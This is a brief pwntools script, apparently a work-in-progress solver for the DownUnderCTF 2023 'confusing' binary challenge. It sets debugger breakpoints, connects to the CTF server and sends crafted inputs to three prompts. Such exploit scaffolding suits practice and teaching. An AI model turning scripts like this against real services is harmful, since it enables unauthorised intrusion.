35 lines
676 B
Python
35 lines
676 B
Python
from pwn import *
|
|
import os
|
|
|
|
os.environ["PWNLIB_DEBUG"] = "1"
|
|
|
|
gs = '''
|
|
unset env LINES
|
|
unset env COLUMNS
|
|
set follow-fork-mode child
|
|
# br *main+78 # first scanf
|
|
br *main+160
|
|
br *main+170
|
|
br *main+220
|
|
c
|
|
'''
|
|
|
|
elf = ELF(os.getcwd()+"/confusing")
|
|
|
|
def start():
|
|
if args.GDB:
|
|
return gdb.debug(elf.path, gs)
|
|
if args.REMOTE:
|
|
return remote("2023.ductf.dev", 30024)
|
|
else:
|
|
return process(elf.path)
|
|
|
|
while True:
|
|
io = start()
|
|
print(io.recvuntil(b"Give me d: "))
|
|
io.sendline(b"7")
|
|
print(io.recvuntil(b"Give me s: "))
|
|
io.sendline(b"FLAG")# + b"\xff"*4)
|
|
print(io.recvuntil(b"Give me f: "))
|
|
io.sendline(b"2")
|
|
io.interactive() |